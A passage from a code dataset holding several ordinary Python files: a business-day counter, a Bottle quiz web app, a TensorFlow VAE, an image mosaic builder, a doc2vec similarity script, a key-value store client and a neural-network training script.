peso ideal, seu IMC e de {:.2f}\".format(IMC))\nelif IMC < 30:\n print(\"Você esta no \\033[7mSobrepeso\\033[m, seu IMC e de {:.2f}\".format(IMC))\nelif IMC < 40:\n print(\"Você esta no \\033[7mObesidade\\033[m, seu IMC e de {:.2f}\".format(IMC))\nelse:\n print(\"Você esta no \\033[7mObesidade mórdida\\033[m, seu IMC e de {:.2f}\".format(IMC))","sub_path":"Arquivos Exercicios/Exercicios/Ex043.py","file_name":"Ex043.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"482705249","text":"'''\n\n- entrada dos dados: conta(data_inicio, data_fim, datas_feriados, dias_dos_fins_de_semana)\n\n- as datas_início/fim deverão estar no formato datetime\n\n- datas_feriados, também em datetime, serão determinados antes de chamar a função, puxados de 'feriados.csv'\n\n- dias_dos_fins_de_semana: os dias da semana no datetime são\n \n [MON, TUE, WED, THU, FRI, SAT, SUN]\n seus indexes serão\n 0 1 2 3 4 5 6\n \n ex: se os finais de semana forem o sábado e o domingo --> 5,6 (tupla mesmo)\n \n \n### acrescento a função que conta os dias corridos conforme a legislação tributária ###\n\nimagino que seja conforme art.210 do CTN\n\n Art. 210. Os prazos fixados nesta Lei ou legislação tributária serão contínuos, \n excluindo-se na sua contagem o dia de início e incluindo-se o de vencimento.\n\n Parágrafo único. Os prazos só se iniciam ou vencem em dia de expediente normal \n na repartição em que corra o processo ou deva ser praticado o ato.\n\nIsso para o IR acho que é importante, e aplico o mesmo pro resto das taxas nos Títulos.\nparece um detalhe, mas são 2,5 pontos percentuais da rentabilidade cada vez q muda\n\nentão é importante saber o dia certo que o cara vai ter um ganho por causa de prazo \n\na função pede duas coisas a mais:\n\n1 - D + ?\n2 - o primeiro dia tem que ser útil?\n\n\n'''\n\n \nimport datetime\nfrom datetime import datetime\nfrom datetime import timedelta\nimport csv\nimport sys\n\ninstruc = ('\\nPara calcular dias úteis:' + '\\n\\n'\n \t 'networkdays.py [inicio] [fim]' + '\\n\\n' +\n \t 'Para calcular dias corridos conforme legislação tributária:' + '\\n\\n'\n \t 'networkdays.py [inicio] [fim] -ct' + '\\n\\n' +\n \t 'as datas devem estar no formato dd/mm/aaaa\\n')\n \t \n\n\ndef corridos(start_date,\n end_date,\n holidays,\n weekends,\n dmaisqto = 0,\n prim_util = False):\n \n if prim_util is False:\n dmaisn = start_date + timedelta(dmaisqto)\n\n else:\n dmaisn = start_date + timedelta(dmaisqto)\n while (dmaisn in holidays) or (dmaisn.weekday() in weekends):\n dmaisn += timedelta(1)\n \n ct = (end_date - dmaisn).days + 1\n \n return ct\n\ndef conta(start_date,\n end_date,\n holidays,\n weekends):\n \n delta_days = (end_date - start_date).days + 1\n \n full_weeks, extra_days = divmod(delta_days, 7)\n \n # num_workdays = how many days/week you work * total of weeks\n \n num_workdays = (full_weeks + 1) * (7 - len(weekends))\n \n # subtract out any working days that fall in the 'shortened week'\n \n for d in range(1, 8 - extra_days):\n if (end_date + timedelta(d)).weekday() not in weekends:\n num_workdays -= 1\n \n # skip holidays that fall on weekends\n \n holidays = [x for x in holidays if x.weekday() not in weekends]\n \n # subtract out any holidays \n\n for d in holidays:\n if start_date <= d <= end_date:\n num_workdays -= 1\n \n return num_workdays\n \n \nif __name__ == \"__main__\":\n\n if len(sys.argv) in (3,4):\n \n # carregar os feriados do CSV\n feriados = []\n\n arquivo = open('feriados.csv')\n arquivolido = csv.reader(arquivo)\n\n for row in arquivolido:\n feriados.append(datetime.strptime(row[0],'%Y-%m-%d %H:%M:%S'))\n\n arquivo.close()\n\n # definir os fins de semana\n findi = 5,6\n\n # checa o formato das datas\n try:\n init = datetime.strptime(sys.argv[1], '%d/%m/%Y')\n try: \n fini = datetime.strptime(sys.argv[2], '%d/%m/%Y')\n \n # testa se a data final é maior que a inicial, se tudo ok chama a função\n if init > fini:\n raise SystemExit('data final menor que a inicial')\n else:\n if len(sys.argv) == 3:\n print(conta(init,fini,feriados, findi))\n elif sys.argv[3] == '-ct':\n print(corridos(init,fini,feriados, findi))\n else:\n \t sys.exit(instruc)\n except ValueError:\n raise SystemExit('a data final é inválida ou não está no formato pedido')\n except ValueError:\n raise SystemExit('a data inicial é inválida ou não está no formato pedido')\n \n else:\n \t sys.exit(instruc)\n","sub_path":"Tesouro/networkdays.py","file_name":"networkdays.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"640851390","text":"import bottle\nfrom bottle import run, default_app, debug, template, request, redirect, get, post, static_file, BaseTemplate, HTTPResponse, HTTPError, time\nimport sqlite3, oauth\nfrom beaker.middleware import SessionMiddleware\n\nsession_opts = {\n 'session.type': 'file',\n 'session.cookie_expires': 300,\n 'session.data_dir': './data',\n 'session.auto': True\n}\n\n@get('/')\ndef getfile(filename):\n return static_file(filename, root='./static/')\n\n@get('')\ndef getOtherFile(filename):\n return static_file(filename, root='./static/')\n\n@get('/')\ndef main():\n output = template('main.tpl')\n return output\n\n@get('/main')\ndef redirectmain():\n return redirect('/')\n\n@get('/gamelore')\ndef gamelore():\n output = template('gamelore.tpl')\n return output\n\n@get('/gamerule')\ndef gamerule():\n output = template('gamerule.tpl')\n return output\n\n\n#Select different level questions: 'EntryLevel', 'MidLevel', 'HighLevel'\ndef selectLevelQuestion(level):\n conn = sqlite3.connect('./Database/princess.db')\n c = conn.cursor()\n c.execute(\"select count(distinct(Question)) from Questions where GameLevel=?\" , (level,))\n result = c.fetchall()\n global total\n for row in result:\n total = int(row[0])\n print(total)\n\n curr_time = int(round(time.time()))\n rand_value = curr_time % total + 1\n print(rand_value)\n #c.execute(\"update Questions SET Question = 'Who is credited with inventing the first mass produced helicopter?' where QuestionID=4\")\n #conn.commit()\n c.execute(\"select QuestionID from Questions where GameLevel=?\", (level,))\n result = c.fetchall()\n c.close()\n index=1\n global qid\n for row in result:\n if(index == rand_value):\n qid = int(row[0])\n index = index + 1\n return qid\n\n@get('/gamepage')\ndef gamepage(qid=1):\n session = bottle.request.environ.get('beaker.session')\n game_user = session.get('game_user')\n if game_user is None:\n return redirect(\"/\")\n qid = selectLevelQuestion('EntryLevel')\n conn = sqlite3.connect('./Database/princess.db')\n c = conn.cursor()\n\n c.execute(\"select Q.Question,group_concat(O.Options_value) as Options_value from Questions Q , Options O where Q.QuestionID=O.QuestionID and Q.QuestionID=? GROUP BY Q.Question\",(qid,))\n\n result = c.fetchall()\n c.close()\n global option\n for row in result:\n option = row[1].split(',')\n\n output = template('gamepage.tpl', questions=result, options=option)\n return output\n\n@get('/contactus')\ndef contactus():\n output = template('contactus.tpl')\n return output\n\n@get('/signin')\ndef contactus():\n output = template('signin.tpl')\n return output\n\n@post('/googlesignin')\ndef google():\n if oauth.validateGoogle():\n return HTTPResponse(body='', status=200, headers=None)\n else:\n return HTTPError(status=500, body=None, exception=None, traceback=None)\n\n@post('/facebooksignin')\ndef facebook():\n if oauth.validateFacebook():\n return HTTPResponse(status=200)\n else:\n return HTTPError(status=500)\n\nif __name__ == \"__main__\":\n app = SessionMiddleware(bottle.app(), session_opts)\n debug(True)\n bottle.run(app=app, host='localhost',port=8080, reloader=True)\nelse:\n application = SessionMiddleware(default_app(), session_opts)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"431919228","text":"import os\nimport random\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport settings\nfrom databases import OmniglotDatabase\n\nimport matplotlib.pyplot as plt\n\n\nclass CheckPointFreq(tf.keras.callbacks.ModelCheckpoint):\n def __init__(self, epochs, freq=1, *args, **kwargs):\n super(CheckPointFreq, self).__init__(*args, **kwargs)\n self.freq = freq\n self.epochs = epochs\n\n def on_epoch_end(self, epoch, logs=None):\n if epoch != 0 and (epoch + 1) % self.freq == 0:\n super(CheckPointFreq, self).on_epoch_end(epoch, logs)\n\n def on_train_end(self, logs=None):\n self.epochs_since_last_save = np.inf\n self._save_model(self.epochs, logs)\n\n super(CheckPointFreq, self).on_train_end(logs)\n\n\nclass VisualizationCallback(tf.keras.callbacks.TensorBoard):\n def __init__(self, visualization_freq=1, *args, **kwargs):\n super(VisualizationCallback, self).__init__(*args, **kwargs)\n self.visualization_freq = visualization_freq\n\n def on_epoch_end(self, epoch, logs=None):\n super(VisualizationCallback, self).on_epoch_end(epoch, logs)\n if epoch != 0 and epoch % self.visualization_freq == 0:\n vae = self.model\n for item in vae.get_train_dataset().take(1):\n z_mean, z_log_var, z = vae.encode(item)\n new_item = vae.decode(z)\n\n writer = self._get_writer(self._train_run_name)\n with writer.as_default():\n tf.summary.image(name='x', data=item, step=epoch, max_outputs=5)\n tf.summary.image(name='x^', data=new_item, step=epoch, max_outputs=5)\n\n\nclass AudioCallback(tf.keras.callbacks.TensorBoard):\n def __init__(self, visualization_freq=1, *args, **kwargs):\n super(AudioCallback, self).__init__(*args, **kwargs)\n self.visualization_freq = visualization_freq\n\n def on_epoch_end(self, epoch, logs=None):\n super(AudioCallback, self).on_epoch_end(epoch, logs)\n if epoch != 0 and epoch % self.visualization_freq == 0:\n vae = self.model\n for item in vae.get_train_dataset().take(1):\n z_mean, z_log_var, z = vae.encode(item)\n new_item = vae.decode(z)\n\n writer = self._get_writer(self._train_run_name)\n with writer.as_default():\n tf.summary.audio(name='x', data=item, sample_rate=16000, step=epoch, max_outputs=5)\n tf.summary.audio(name='x^', data=new_item, step=epoch, sample_rate=16000, max_outputs=5)\n\n\nclass Sampling(layers.Layer):\n \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\n def call(self, inputs):\n z_mean, z_log_var = inputs\n batch = tf.shape(z_mean)[0]\n dim = tf.shape(z_mean)[1]\n epsilon = tf.keras.backend.random_normal(shape=(batch, dim))\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\n\n\nclass VAE(keras.Model):\n def __init__(\n self,\n vae_name,\n image_shape,\n latent_dim,\n database,\n parser,\n encoder,\n decoder,\n visualization_freq,\n learning_rate,\n **kwargs\n ):\n super(VAE, self).__init__(**kwargs)\n self.latent_dim = latent_dim\n self.database = database\n self.parser = parser\n self.visualization_freq = visualization_freq\n self.image_shape = image_shape\n self.optimizer = keras.optimizers.Adam(learning_rate=learning_rate)\n self.sampler = Sampling()\n self.vae_name = vae_name\n self.encoder = encoder\n self.decoder = decoder\n\n self.loss_metric = tf.keras.metrics.Mean()\n self.reconstruction_loss_metric = tf.keras.metrics.Mean()\n self.kl_loss_metric = tf.keras.metrics.Mean()\n\n def get_vae_name(self):\n return self.vae_name\n\n def sample(self, z_mean, z_log_var):\n return self.sampler((z_mean, z_log_var))\n\n def encode(self, item):\n z_mean, z_log_var = self.encoder(item)\n z = self.sample(z_mean, z_log_var)\n return z_mean, z_log_var, z\n\n def decode(self, item):\n return self.decoder(item)\n\n def call(self, inputs, training=None, mask=None):\n z_mean, z_log_var = self.encoder(inputs)\n z = self.sampler([z_mean, z_log_var])\n reconstruction = self.decoder(z)\n reconstruction_loss = tf.reduce_mean(\n keras.losses.binary_crossentropy(inputs, reconstruction)\n )\n reconstruction_loss *= np.prod(self.image_shape)\n kl_loss = 1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var)\n kl_loss = tf.reduce_mean(kl_loss)\n kl_loss *= -0.5\n total_loss = reconstruction_loss + kl_loss\n\n return {\n \"loss\": total_loss,\n \"reconstruction_loss\": reconstruction_loss,\n \"kl_loss\": kl_loss,\n }\n\n def test_step(self, data):\n outputs = self.call(data)\n self.loss_metric.update_state(outputs['loss'])\n self.reconstruction_loss_metric.update_state(outputs['reconstruction_loss'])\n self.kl_loss_metric.update_state(outputs['kl_loss'])\n\n return {\n \"loss\": self.loss_metric.result(),\n \"reconstruction_loss\": self.reconstruction_loss_metric.result(),\n \"kl_loss\": self.kl_loss_metric.result()\n }\n\n def train_step(self, data):\n with tf.GradientTape() as tape:\n outputs = self.call(data)\n\n grads = tape.gradient(outputs['loss'], self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n\n self.loss_metric.update_state(outputs['loss'])\n self.reconstruction_loss_metric.update_state(outputs['reconstruction_loss'])\n self.kl_loss_metric.update_state(outputs['kl_loss'])\n\n return {\n \"loss\": self.loss_metric.result(),\n \"reconstruction_loss\": self.reconstruction_loss_metric.result(),\n \"kl_loss\": self.kl_loss_metric.result()\n }\n\n def get_dataset(self, partition='train'):\n instances = self.database.get_all_instances(partition_name=partition)\n random.shuffle(instances)\n train_dataset = tf.data.Dataset.from_tensor_slices(instances).shuffle(len(instances))\n train_dataset = train_dataset.map(self.parser.get_parse_fn())\n train_dataset = train_dataset.batch(128)\n return train_dataset\n\n def get_train_dataset(self):\n return self.get_dataset(partition='train')\n\n def get_val_dataset(self):\n return self.get_dataset(partition='val')\n\n def load_latest_checkpoint(self, epoch_to_load_from=None):\n latest_checkpoint = tf.train.latest_checkpoint(\n os.path.join(\n settings.PROJECT_ROOT_ADDRESS,\n 'models',\n 'lasiummamlvae',\n 'vae',\n self.get_vae_name(),\n 'vae_checkpoints'\n )\n )\n\n if latest_checkpoint is not None:\n self.load_weights(latest_checkpoint)\n epoch = int(latest_checkpoint[latest_checkpoint.rfind('_') + 1:])\n return epoch\n\n return -1\n\n def perform_training(self, epochs, checkpoint_freq=100, vis_callback_cls=None):\n initial_epoch = self.load_latest_checkpoint()\n if initial_epoch != -1:\n print(f'Continue training from epoch {initial_epoch}.')\n\n train_dataset = self.get_train_dataset()\n val_dataset = self.get_val_dataset()\n\n checkpoint_callback = CheckPointFreq(\n freq=checkpoint_freq,\n filepath=os.path.join(\n settings.PROJECT_ROOT_ADDRESS,\n 'models',\n 'lasiummamlvae',\n 'vae',\n self.get_vae_name(),\n 'vae_checkpoints',\n 'vae_{epoch:02d}'\n ),\n save_freq='epoch',\n save_weights_only=True,\n epochs=epochs - 1\n )\n if vis_callback_cls is None:\n vis_callback_cls = VisualizationCallback\n\n tensorboard_callback = vis_callback_cls(\n log_dir=os.path.join(\n settings.PROJECT_ROOT_ADDRESS,\n 'models',\n 'lasiummamlvae',\n 'vae',\n self.get_vae_name(),\n 'vae_logs'\n ),\n visualization_freq=self.visualization_freq\n )\n\n callbacks = [tensorboard_callback, checkpoint_callback]\n\n self.compile(optimizer=self.optimizer)\n self.fit(\n train_dataset,\n epochs=epochs,\n callbacks=callbacks,\n validation_data=val_dataset,\n initial_epoch=initial_epoch\n )\n\n def visualize_meta_learning_task2(self):\n tf.random.set_seed(10)\n for item in self.get_train_dataset().take(1):\n z_mean, z_log_var, z = self.encode(item)\n fig, axes = plt.subplots(1, 6)\n fig.set_figwidth(6)\n fig.set_figheight(1)\n\n axes[0].imshow(item[0, ..., 0], cmap='gray')\n for i in range(1, 6):\n axes[i].imshow(self.decode(z + tf.random.normal(shape=z.shape, stddev=0.2 * i))[0, ..., 0], cmap='gray')\n axes[i].set_xlabel(f'noise stddev: {0.2 * i:0.2f}', size='xx-small')\n\n plt.show()\n\n def visualize_meta_learning_task(self):\n tf.random.set_seed(10)\n for item in self.get_train_dataset().take(1):\n z_mean, z_log_var, z = self.encode(item)\n new_item = self.decode(z)\n\n std = tf.exp(0.5 * z_log_var)\n std = 1 / tf.nn.softmax(std) * std\n\n new_zs = list()\n length = 15\n for i in range(length):\n new_z = z_mean + i / 5 * std\n new_z = new_z[0, ...][tf.newaxis, ...]\n new_zs.append(new_z)\n\n for i in range(length):\n new_z = z_mean - i / 5 * std\n new_z = new_z[0, ...][tf.newaxis, ...]\n new_zs.append(new_z)\n\n fig, axes = plt.subplots(length + 1, 2)\n fig.set_figwidth(2)\n fig.set_figheight(length + 1)\n\n axes[0, 0].imshow(item[0, ..., 0], cmap='gray')\n axes[0, 0].set_xlabel('Real image', size='xx-small')\n axes[0, 1].imshow(new_item[0, ..., 0], cmap='gray')\n axes[0, 1].set_xlabel('Reconstruction', size='xx-small')\n for i in range(1, length + 1):\n new_item = self.decode(new_zs[i - 1][tf.newaxis, ...])\n axes[i, 0].imshow(new_item[0, ..., 0], cmap='gray')\n axes[i, 0].set_xlabel(f'mean + {i / 5} * std', size='xx-small')\n\n new_item = self.decode(new_zs[length + i - 1][tf.newaxis, ...])\n axes[i, 1].imshow(new_item[0, ..., 0], cmap='gray')\n axes[i, 1].set_xlabel(f'mean - {i / 5} * std', size='xx-small')\n\n plt.show()\n\n tf.random.set_seed(None)\n","sub_path":"models/lasiummamlvae/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":11036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"124667335","text":"import numpy as np\nimport random\nimport math\n\ndef culoareMedie(img):\n mCol = []\n for i in range(img.shape[2]):\n mCol.append(img[:, :, i].mean())\n\n return mCol\n\ndef euclDist(v1, v2):\n sum = 0\n for i in range(len(v1)):\n sum += ((v1[i] - v2[i]) * (v1[i] - v2[i]))\n\n return sum\n\ndef getPosCuloareMedieMin(vImg, vPiese):\n minDist = euclDist(vImg, vPiese[0])\n minPos = 0\n eps = 1e-5\n\n for i in range(1, len(vPiese)):\n dist = euclDist(vImg, vPiese[i])\n if dist - minDist < eps:\n minDist = dist\n minPos = i\n\n return minPos\n\ndef getCuloareMedieMin(vImg, vPiese):\n dists = []\n pos = []\n for i in range(0, len(vPiese)):\n dist = euclDist(vImg, vPiese[i])\n dists.append(dist)\n pos.append(i)\n\n minPos = [x for _, x in sorted(zip(dists, pos), key=lambda pair: pair[0])]\n return minPos\n\ndef adaugaPieseMozaicPeCaroiaj(params):\n imgMozaic = np.zeros(params.imgReferintaRedimensionata.shape, dtype=np.uint8)\n (N, H, W, C) = params.pieseMozaic.shape\n (h, w, c) = params.imgReferintaRedimensionata.shape\n\n if params.criteriu == 'aleator':\n nrTotalPiese = params.numarPieseMozaicVerticala \\\n * params.numarPieseMozaicOrizontala\n nrPiesteAdaugate = 0\n for i in range(params.numarPieseMozaicVerticala):\n for j in range(params.numarPieseMozaicOrizontala):\n # alege un indice aleator din cele N\n indice = random.randint(0, N - 1)\n up = i * H\n down = (i + 1) * H\n left = j * W\n right = (j + 1) * W\n\n imgMozaic[up:down, left:right, :] = params.pieseMozaic[indice, :, :, :]\n nrPiesteAdaugate += 1\n\n print('Construim mozaic ... %.2f%%' % (100 \\\n * nrPiesteAdaugate \\\n / nrTotalPiese))\n elif params.criteriu == 'distantaCuloareMedie':\n culoareMediePieseMozaic = []\n for i in range(params.pieseMozaic.shape[0]):\n culoareMediePieseMozaic.append(culoareMedie(params.pieseMozaic[i, :, :, :]))\n\n nrTotalPiese = params.numarPieseMozaicVerticala \\\n * params.numarPieseMozaicOrizontala\n nrPiesteAdaugate = 0\n for i in range(params.numarPieseMozaicVerticala):\n for j in range(params.numarPieseMozaicOrizontala):\n up = i * H\n down = (i + 1) * H\n left = j * W\n right = (j + 1) * W\n\n vImg = culoareMedie(params.imgReferintaRedimensionata[up:down,\n left:right])\n indice = getPosCuloareMedieMin(vImg, culoareMediePieseMozaic)\n\n imgMozaic[up:down, left:right, :] = params.pieseMozaic[indice, :, :, :]\n nrPiesteAdaugate += 1\n\n print('Construim mozaic ... %.2f%%' % (100 \\\n * nrPiesteAdaugate \\\n / nrTotalPiese))\n elif params.criteriu == 'distantaCuloareMedieDiferit':\n pieseMozaicUsed = [[-1 for j in range(params.numarPieseMozaicOrizontala)] for i in range(params.numarPieseMozaicVerticala)]\n dx = [-1, 0, 0, 1]\n dy = [0, -1, 1, 0]\n\n culoareMediePieseMozaic = []\n for i in range(params.pieseMozaic.shape[0]):\n culoareMediePieseMozaic.append(culoareMedie(params.pieseMozaic[i, :, :, :]))\n\n nrTotalPiese = params.numarPieseMozaicVerticala \\\n * params.numarPieseMozaicOrizontala\n nrPiesteAdaugate = 0\n for i in range(params.numarPieseMozaicVerticala):\n for j in range(params.numarPieseMozaicOrizontala):\n up = i * H\n down = (i + 1) * H\n left = j * W\n right = (j + 1) * W\n\n vImg = culoareMedie(params.imgReferintaRedimensionata[up:down,\n left:right])\n\n used_ind = []\n for d in range(4):\n newI = i + dx[d]\n newJ = j + dy[d]\n\n if newI < 0 or newI >= params.numarPieseMozaicVerticala or newJ < 0 or newJ >= params.numarPieseMozaicOrizontala:\n continue\n\n used_ind.append(pieseMozaicUsed[newI][newJ])\n\n inds = getCuloareMedieMin(vImg, culoareMediePieseMozaic)\n for ind in inds:\n if ind not in used_ind:\n indice = ind\n pieseMozaicUsed[i][j] = indice\n break\n\n imgMozaic[up:down, left:right, :] = params.pieseMozaic[indice, :, :, :]\n nrPiesteAdaugate += 1\n\n print('Construim mozaic ... %.2f%%' % (100 \\\n * nrPiesteAdaugate \\\n / nrTotalPiese))\n else:\n raise Exception(\"Optiune necunoscuta!\")\n\n return imgMozaic\n","sub_path":"An III Sem I/cava/Laboratoare/Proiect1_Python/src/adaugaPieseMozaicPeCaroiaj.py","file_name":"adaugaPieseMozaicPeCaroiaj.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"138848024","text":"\n# coding: utf-8\n\n# In[21]:\n\nimport gensim\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport os\nimport pickle\n\n\n# In[22]:\n\ncwd = os.getcwd()\nfolders_path = os.path.join(cwd, r\"20_newsgroups\")\n\n\n# In[60]:\n\nmodel = Doc2Vec.load('doc2vec.model')\n\n\n# In[24]:\n\nf = open(os.path.join(cwd, r'all_data.pkl'), 'rb')\nall_data = pickle.load(f)\nf.close()\n\nf = open(os.path.join(cwd, r'docLabels.pkl'), 'rb')\ndocLabels = pickle.load(f)\nf.close()\n\n\n# In[61]:\n\nprint(\"\"\"comp.graphics's Doc1's similarity with one document each from other folders: \"\"\")\n\ndoc1 = os.path.join(cwd, r'20_newsgroups\\comp.graphics\\37261')\ndoc1tag = all_data[docLabels.index(doc1)]\n\ncount = 0\navg_sim = 0\nfor root, _, files in os.walk(folders_path):\n for file in files:\n doc2 = os.path.join(root, file)\n if 'comp.graphics' in doc2.split('\\\\')[-2:]: #Not comparing with itself\n break\n doc2tag = all_data[docLabels.index(doc2)]\n count += 1\n \n sim = model.n_similarity(doc1tag, doc2tag)\n avg_sim += sim\n \n print(\"Similarity of \" + str(doc1.split('\\\\')[-2:]) + \" and \" + str(doc2.split('\\\\')[-2:]) + \": \" + str(sim))\n break\n\nprint(avg_sim/count)\n\n\n# In[62]:\n\nprint(\"\"\"comp.graphics's Doc1's similarity with 19 other documents: \"\"\")\n\ngraphics_folder_path = os.path.join(cwd, r'20_newsgroups\\comp.graphics')\ndoc1 = os.path.join(cwd, r'20_newsgroups\\comp.graphics\\37261')\ndoc1tag = all_data[docLabels.index(doc1)]\n\ncount = 0\navg_sim = 0\nfor root, _, files in os.walk(graphics_folder_path):\n for file in files:\n doc2 = os.path.join(root, file)\n if '37261' in doc2.split('\\\\')[-2:]: #Not comparing with itself\n continue\n doc2tag = all_data[docLabels.index(doc2)]\n count += 1\n \n if (count == 20):\n break\n sim = model.n_similarity(doc1tag, doc2tag)\n avg_sim += sim\n \n print(\"Similarity of \" + str(doc1.split('\\\\')[-1:]) + \" and \" + str(doc2.split('\\\\')[-1:]) + \": \" + str(sim))\n\nprint(avg_sim/(count-1))\n\n","sub_path":"Assignment6/q2_find_sim.py","file_name":"q2_find_sim.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"581635472","text":"#coding=utf-8\n\nimport struct\nimport greenlet\n\nclass GmdbError(Exception):\n pass\n\nMAGIC = 0xc8\n\n# >0 包完整,并返回包的实际长度\n# =0 包不完整,需要后续的数据\n# <0 出错,包不合法\ndef check_get_pkg_len(data):\n fail_code = ord(data[0:1])\n if fail_code:\n return 1 #包长度为1\n datalen = len(data)\n if datalen < 5:\n return 0 #继续收包\n vallen = struct.unpack('>I', data[1:5])[0]\n if datalen < vallen + 5:\n return 0 #继续收包\n return vallen + 5 #完整的包长度\n\ndef check_put_pkg_len(data):\n return 1\n\ndef check_get_list_pkg_len(data):\n fail_code = ord(data[0:1])\n if fail_code:\n return 1\n datalen = len(data)\n if datalen < 5:\n return 0\n rnum = struct.unpack('>I', data[1:5])[0]\n if rnum == 0:\n return 5\n elif datalen < 13:\n return 0\n index = 5\n for i in xrange(0, rnum):\n keylen, vallen = struct.unpack('>II', data[index:index+8])\n if datalen < (index+8+keylen+vallen):\n return 0\n else:\n index += (8+keylen+vallen)\n return index\n\ndef check_add_int_pkg_len(data):\n datalen = len(data)\n if datalen < 5:\n return 0\n return 5\n\nclass gmdb_api():\n def __init__(self, ip, port):\n self.module = 'IP_%s_%d'%(ip, port)\n\n def get(self, key):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBI', MAGIC, 0x30, len(key)) + key\n req_dict = {'module':self.module,'data':data,'check_len':check_get_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if 7 == fail_code:\n return None\n elif 0 != fail_code:\n raise GmdbError(fail_code)\n return ret_data[5:]\n\n def set(self, key, val):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBII', MAGIC, 0x10, len(key), len(val)) + key + val\n req_dict = {'module':self.module,'data':data,'check_len':check_put_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n \n def delete(self, key):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBI', MAGIC, 0x20, len(key)) + key\n req_dict = {'module':self.module,'data':data,'check_len':check_put_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n\n def get_list(self, keys):\n data = struct.pack('>BBI', MAGIC, 0x31, len(keys))\n for key in keys:\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data += struct.pack('>I', len(key)) + key\n req_dict = {'module':self.module,'data':data,'check_len':check_get_list_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n rnum = struct.unpack('>I', ret_data[1:5])[0]\n index = 5\n ret_dict = {}\n for i in xrange(0, rnum):\n keylen, vallen = struct.unpack('>II', ret_data[index:index+8])\n ret_dict[ret_data[index+8:index+8+keylen]] = ret_data[index+8+keylen:index+8+keylen+vallen]\n index += (8+keylen+vallen)\n return ret_dict\n \n def add_int(self, key, num):\n if isinstance(key, int) or isinstance(key, long):\n key = struct.pack('=Q', key)\n data = struct.pack('>BBII', MAGIC, 0x60, len(key), num) + key\n req_dict = {'module':self.module,'data':data,'check_len':check_add_int_pkg_len}\n ret_dict = greenlet.getcurrent().parent.switch(req_dict)\n ret_data = ret_dict['data']\n fail_code = ord(ret_data[0:1])\n if fail_code:\n raise GmdbError(fail_code)\n return struct.unpack('>I', ret_data[1:5])\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"api/gmdb_api.py","file_name":"gmdb_api.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"7270350","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 22 21:41:44 2020\n\n@author: benny\n\"\"\"\n\nimport numpy as np\nimport sys\n\nf = open(sys.argv[1])\n\n#f = open('ion.train.0')\ndata = np.loadtxt(f)\ndata_s = data.copy()\ntrain = data[:,1:]\ntrainlabels = data[:,0]\n\nonearray = np.ones((train.shape[0],1))\ntrain = np.append(train,onearray,axis=1)\n\nmini_batch_size = 32\nmini_batch_array = np.random.randint(0,len(data),mini_batch_size)\n\ntrain_s = data_s[:mini_batch_size,1:]\nonearray = np.ones((train_s.shape[0],1))\ntrain_s = np.append(train_s,onearray,axis=1)\ntrainlabels_s = data_s[:mini_batch_size,0]\n\n#print(\"train=\",train)\n#print(\"train shape=\",train.shape)\n\nf = open(sys.argv[2])\n#f = open('ion.test.0')\ndata = np.loadtxt(f)\ntest = data[:,1:]\ntestlabels = data[:,0]\nonearray = np.ones((test.shape[0],1))\ntest = np.append(test,onearray,axis=1)\n\nrows = train.shape[0]\ncols = train.shape[1]\n\n\n\n\nif len(sys.argv)>3: \n hidden_nodes = int(sys.argv[3])\nelse:\n hidden_nodes=3\n\n#hidden_nodes=4\n#print(hidden_nodes)\n\nw = np.random.rand(hidden_nodes)\n#print(\"w=\",w)\n\nW = np.random.rand(hidden_nodes,cols)\n#print(\"w=\",W)\n\nepochs =10000\neta = 0.01\nprevobj = np.inf\nk = 0\n\n\n\n#calculate objective\nhidden_layer = np.matmul(train, np.transpose(W))\n#print(\"hidden_layer=\",hidden_layer)\n#print(\"hidden_layer shape=\",hidden_layer.shape)\n\nsigmoid = lambda x: 1/(1+np.exp(-x))\nhidden_layer = np.array([sigmoid(xi) for xi in hidden_layer])\n#print(\"hidden_layer = \",hidden_layer)\n#print(\"hidden_layer shape\", hidden_layer.shape)\nhidden_layer_fullDS = np.matmul(train, np.transpose(W))\nhidden_layer_fullDS = np.array([sigmoid(xi) for xi in 